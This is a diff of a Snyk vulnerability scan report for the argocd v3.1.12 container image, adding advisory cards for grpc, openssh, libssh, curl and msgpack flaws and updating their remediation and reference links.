              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -506,8 +506,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>55</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>199 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>62</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>206 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>2320</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -516,6 +516,80 @@

    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
+        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
+            <h2 class="card__title">Incorrect Authorization</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--critical">
+                        <span class="label__text">critical severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> /usr/local/bin/argocd
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/argoproj/argo-cd/v3@* and google.golang.org/grpc@v1.73.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.73.0
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Untrusted Search Path</h2>
            <div class="card__section">
@@ -1168,6 +1242,89 @@
                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-OPENSSL-15121120">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">CVE-2026-3497</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argocd <span class="list-paths__item__arrow">›</span> Dockerfile
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: ubuntu:24.04
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            openssh/openssh-client
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                docker-image|quay.io/argoproj/argocd@v3.1.12 and openssh/openssh-client@1:9.6p1-3ubuntu13.14
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        docker-image|quay.io/argoproj/argocd@v3.1.12
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        openssh/openssh-client@1:9.6p1-3ubuntu13.14
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="nvd-description">NVD Description</h2>
+        <p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssh</code> package and not the <code>openssh</code> package as distributed by <code>Ubuntu</code>.</em>
+        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
+        <p>Vulnerability in the OpenSSH GSSAPI delta included in various Linux distributions. This vulnerability affects the GSSAPI patches added by various Linux distributions and does not affect the OpenSSH upstream project itself. The usage of sshpkt_disconnect() on an error, which does not terminate the process, allows an attacker to send an unexpected GSSAPI message type during the GSSAPI key exchange to the server, which will call the underlying function and continue the execution of the program without setting the related connection variables. As the variables are not initialized to NULL the code later accesses those uninitialized variables, accessing random memory, which could lead to undefined behavior. The recommended workaround is to use ssh_packet_disconnect() instead, which does terminate the process. The impact of the vulnerability depends heavily on the compiler flag hardening configuration.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>openssh</code> to version 1:9.6p1-3ubuntu13.15 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3497">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3497</a></li>
+        <li><a href="https://ubuntu.com/security/CVE-2026-3497">https://ubuntu.com/security/CVE-2026-3497</a></li>
+        <li><a href="https://www.openwall.com/lists/oss-security/2026/03/12/3">https://www.openwall.com/lists/oss-security/2026/03/12/3</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/12/3">http://www.openwall.com/lists/oss-security/2026/03/12/3</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/14/3">http://www.openwall.com/lists/oss-security/2026/03/14/3</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/14/4">http://www.openwall.com/lists/oss-security/2026/03/14/4</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/18/2">http://www.openwall.com/lists/oss-security/2026/03/18/2</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/18/4">http://www.openwall.com/lists/oss-security/2026/03/18/4</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/18/5">http://www.openwall.com/lists/oss-security/2026/03/18/5</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/18/7">http://www.openwall.com/lists/oss-security/2026/03/18/7</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-OPENSSH-15560204">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">CVE-2026-0964</h2>
@@ -1396,6 +1553,90 @@
                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-LIBSSH-15357013">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Out-of-Bounds</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argocd <span class="list-paths__item__arrow">›</span> Dockerfile
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: ubuntu:24.04
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            libssh/libssh-4
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    docker-image|quay.io/argoproj/argocd@v3.1.12, git@1:2.43.0-1ubuntu7.3 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        docker-image|quay.io/argoproj/argocd@v3.1.12
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        git@1:2.43.0-1ubuntu7.3
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        curl/libcurl3t64-gnutls@8.5.0-2ubuntu10.6
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        libssh/libssh-4@0.10.6-2ubuntu0.2
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="nvd-description">NVD Description</h2>
+        <p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>libssh</code> package and not the <code>libssh</code> package as distributed by <code>Ubuntu</code>.</em>
+        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
+        <p>A weakness has been identified in libssh up to 0.11.3. The impacted element is the function sftp_extensions_get_name/sftp_extensions_get_data of the file src/sftp.c of the component SFTP Extension Name Handler. Executing a manipulation of the argument idx can lead to out-of-bounds read. The attack may be performed from remote. Upgrading to version 0.11.4 and 0.12.0 is sufficient to resolve this issue. This patch is called 855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60. You should upgrade the affected component.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>libssh</code> to version 0.10.6-2ubuntu0.4 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3731">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3731</a></li>
+        <li><a href="https://gitlab.com/libssh/libssh-mirror/-/commit/855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60">https://gitlab.com/libssh/libssh-mirror/-/commit/855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60</a></li>
+        <li><a href="https://vuldb.com/?ctiid.349709">https://vuldb.com/?ctiid.349709</a></li>
+        <li><a href="https://vuldb.com/?id.349709">https://vuldb.com/?id.349709</a></li>
+        <li><a href="https://vuldb.com/?submit.767120">https://vuldb.com/?submit.767120</a></li>
+        <li><a href="https://www.libssh.org/files/0.12/libssh-0.12.0.tar.xz">https://www.libssh.org/files/0.12/libssh-0.12.0.tar.xz</a></li>
+        <li><a href="https://www.libssh.org/security/advisories/libssh-2026-sftp-extensions.txt">https://www.libssh.org/security/advisories/libssh-2026-sftp-extensions.txt</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-LIBSSH-15440974">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Inefficient Algorithmic Complexity</h2>
@@ -1682,6 +1923,10 @@
        <li><a href="https://access.redhat.com/security/cve/CVE-2025-14831">https://access.redhat.com/security/cve/CVE-2025-14831</a></li>
        <li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2423177">https://bugzilla.redhat.com/show_bug.cgi?id=2423177</a></li>
        <li><a href="https://access.redhat.com/errata/RHSA-2026:3477">https://access.redhat.com/errata/RHSA-2026:3477</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4188">https://access.redhat.com/errata/RHSA-2026:4188</a></li>
+        <li><a href="https://gitlab.com/gnutls/gnutls/-/issues/1773">https://gitlab.com/gnutls/gnutls/-/issues/1773</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4655">https://access.redhat.com/errata/RHSA-2026:4655</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4943">https://access.redhat.com/errata/RHSA-2026:4943</a></li>
        </ul>
        
              <hr/>
@@ -2096,6 +2341,79 @@
                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-GLIBC-15051735">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Improper Validation of Specified Type of Input</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> /usr/local/bin/argocd
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/vmihailenco/msgpack/v5
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/argoproj/argo-cd/v3@* and github.com/vmihailenco/msgpack/v5@v5.4.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/vmihailenco/msgpack/v5@v5.4.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the calls plugin when handling websocket messages containing malformed msgpack frames. An attacker can cause the server to consume excessive memory and crash by sending specially crafted websocket requests.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>There is no fixed version for <code>github.com/vmihailenco/msgpack/v5</code>.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/mattermost/msgpack/commit/2f9c67d7e57f">GitHub Commit</a></li>
+        <li><a href="https://mattermost.com/security-updates">Mattermost Security Updates</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVMIHAILENCOMSGPACKV5-15702238">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">MPL-2.0 license</h2>
@@ -3114,6 +3432,192 @@
                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-CURL-14905896">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">CVE-2026-1965</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argocd <span class="list-paths__item__arrow">›</span> Dockerfile
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: ubuntu:24.04
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            curl/libcurl3t64-gnutls
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    docker-image|quay.io/argoproj/argocd@v3.1.12, git@1:2.43.0-1ubuntu7.3 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        docker-image|quay.io/argoproj/argocd@v3.1.12
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        git@1:2.43.0-1ubuntu7.3
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        curl/libcurl3t64-gnutls@8.5.0-2ubuntu10.6
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="nvd-description">NVD Description</h2>
+        <p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>curl</code> package and not the <code>curl</code> package as distributed by <code>Ubuntu</code>.</em>
+        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
+        <p>libcurl can in some circumstances reuse the wrong connection when asked to do
+        an Negotiate-authenticated HTTP or HTTPS request.</p>
+        <p>libcurl features a pool of recent connections so that subsequent requests can
+        reuse an existing connection to avoid overhead.</p>
+        <p>When reusing a connection a range of criterion must first be met. Due to a
+        logical error in the code, a request that was issued by an application could
+        wrongfully reuse an existing connection to the same server that was
+        authenticated using different credentials. One underlying reason being that
+        Negotiate sometimes authenticates <em>connections</em> and not <em>requests</em>, contrary
+        to how HTTP is designed to work.</p>
+        <p>An application that allows Negotiate authentication to a server (that responds
+        wanting Negotiate) with <code>user1:password1</code> and then does another operation to
+        the same server also using Negotiate but with <code>user2:password2</code> (while the
+        previous connection is still alive) - the second request wrongly reused the
+        same connection and since it then sees that the Negotiate negotiation is
+        already made, it just sends the request over that connection thinking it uses
+        the user2 credentials when it is in fact still using the connection
+        authenticated for user1...</p>
+        <p>The set of authentication methods to use is set with  <code>CURLOPT_HTTPAUTH</code>.</p>
+        <p>Applications can disable libcurl&#39;s reuse of connections and thus mitigate this
+        problem, by using one of the following libcurl options to alter how
+        connections are or are not reused: <code>CURLOPT_FRESH_CONNECT</code>,
+        <code>CURLOPT_MAXCONNECTS</code> and <code>CURLMOPT_MAX_HOST_CONNECTIONS</code> (if using the
+        curl_multi API).</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>curl</code> to version 8.5.0-2ubuntu10.8 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-1965">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-1965</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-1965.html">https://curl.se/docs/CVE-2026-1965.html</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-1965.json">https://curl.se/docs/CVE-2026-1965.json</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-CURL-15460489">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">CVE-2026-3783</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argocd <span class="list-paths__item__arrow">›</span> Dockerfile
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: ubuntu:24.04
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            curl/libcurl3t64-gnutls
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    docker-image|quay.io/argoproj/argocd@v3.1.12, git@1:2.43.0-1ubuntu7.3 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        docker-image|quay.io/argoproj/argocd@v3.1.12
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        git@1:2.43.0-1ubuntu7.3
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        curl/libcurl3t64-gnutls@8.5.0-2ubuntu10.6
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="nvd-description">NVD Description</h2>
+        <p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>curl</code> package and not the <code>curl</code> package as distributed by <code>Ubuntu</code>.</em>
+        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
+        <p>When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
+        performs a redirect to a second URL, curl could leak that token to the second
+        hostname under some circumstances.</p>
+        <p>If the hostname that the first request is redirected to has information in the
+        used .netrc file, with either of the <code>machine</code> or <code>default</code> keywords, curl
+        would pass on the bearer token set for the first host also to the second one.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>curl</code> to version 8.5.0-2ubuntu10.8 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3783">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3783</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-3783.html">https://curl.se/docs/CVE-2026-3783.html</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-3783.json">https://curl.se/docs/CVE-2026-3783.json</a></li>
+        <li><a href="https://hackerone.com/reports/3583983">https://hackerone.com/reports/3583983</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/11/2">http://www.openwall.com/lists/oss-security/2026/03/11/2</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-CURL-15460664">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--low" data-snyk-test="low">
            <h2 class="card__title">CVE-2024-56433</h2>
@@ -5202,7 +5706,7 @@
        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
        <p>ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)</p>
        <h2 id="remediation">Remediation</h2>
-        <p>There is no fixed version for <code>Ubuntu:24.04</code> <code>openssh</code>.</p>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>openssh</code> to version 1:9.6p1-3ubuntu13.15 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-61984">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-61984</a></li>
@@ -5284,7 +5788,7 @@
        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
        <p>ssh in OpenSSH before 10.1 allows the &#39;\0&#39; character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used.</p>
        <h2 id="remediation">Remediation</h2>
-        <p>There is no fixed version for <code>Ubuntu:24.04</code> <code>openssh</code>.</p>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>openssh</code> to version 1:9.6p1-3ubuntu13.15 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-61985">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-61985</a></li>
@@ -5840,6 +6344,9 @@
        <li><a href="https://www.gnutls.org/security-new.html#GNUTLS-SA-2025-11-18">https://www.gnutls.org/security-new.html#GNUTLS-SA-2025-11-18</a></li>
        <li><a href="http://www.openwall.com/lists/oss-security/2025/11/20/2">http://www.openwall.com/lists/oss-security/2025/11/20/2</a></li>
        <li><a href="https://access.redhat.com/errata/RHSA-2026:3477">https://access.redhat.com/errata/RHSA-2026:3477</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4188">https://access.redhat.com/errata/RHSA-2026:4188</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4655">https://access.redhat.com/errata/RHSA-2026:4655</a></li>
+        <li><a href="https://access.redhat.com/errata/RHSA-2026:4943">https://access.redhat.com/errata/RHSA-2026:4943</a></li>
        </ul>
        
              <hr/>
@@ -6505,6 +7012,88 @@
                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-CURL-14894739">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--low" data-snyk-test="low">
+            <h2 class="card__title">CVE-2026-3784</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--low">
+                        <span class="label__text">low severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.1.12/argoproj/argocd <span class="list-paths__item__arrow">›</span> Dockerfile
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: ubuntu:24.04
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            curl/libcurl3t64-gnutls
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    docker-image|quay.io/argoproj/argocd@v3.1.12, git@1:2.43.0-1ubuntu7.3 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        docker-image|quay.io/argoproj/argocd@v3.1.12
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        git@1:2.43.0-1ubuntu7.3
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        curl/libcurl3t64-gnutls@8.5.0-2ubuntu10.6
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="nvd-description">NVD Description</h2>
+        <p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>curl</code> package and not the <code>curl</code> package as distributed by <code>Ubuntu</code>.</em>
+        <em>See <code>How to fix?</code> for <code>Ubuntu:24.04</code> relevant fixed versions and status.</em></p>
+        <p>curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a
+        server, even if the new request uses different credentials for the HTTP proxy.
+        The proper behavior is to create or use a separate connection.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>curl</code> to version 8.5.0-2ubuntu10.8 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3784">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2026-3784</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-3784.html">https://curl.se/docs/CVE-2026-3784.html</a></li>
+        <li><a href="https://curl.se/docs/CVE-2026-3784.json">https://curl.se/docs/CVE-2026-3784.json</a></li>
+        <li><a href="https://hackerone.com/reports/3584903">https://hackerone.com/reports/3584903</a></li>
+        <li><a href="http://www.openwall.com/lists/oss-security/2026/03/11/3">http://www.openwall.com/lists/oss-security/2026/03/11/3</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-UBUNTU2404-CURL-15460592">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--low" data-snyk-test="low">
            <h2 class="card__title">CVE-2025-0167</h2>
@@ -6573,7 +7162,7 @@
        <p>This flaw only manifests itself if the netrc file has a <code>default</code> entry that
        omits both login and password. A rare circumstance.</p>
        <h2 id="remediation">Remediation</h2>
-        <p>There is no fixed version for <code>Ubuntu:24.04</code> <code>curl</code>.</p>
+        <p>Upgrade <code>Ubuntu:24.04</code> <code>curl</code> to version 8.5.0-2ubuntu10.8 or higher.</p>
        <h2 id="references">References</h2>
        <ul>
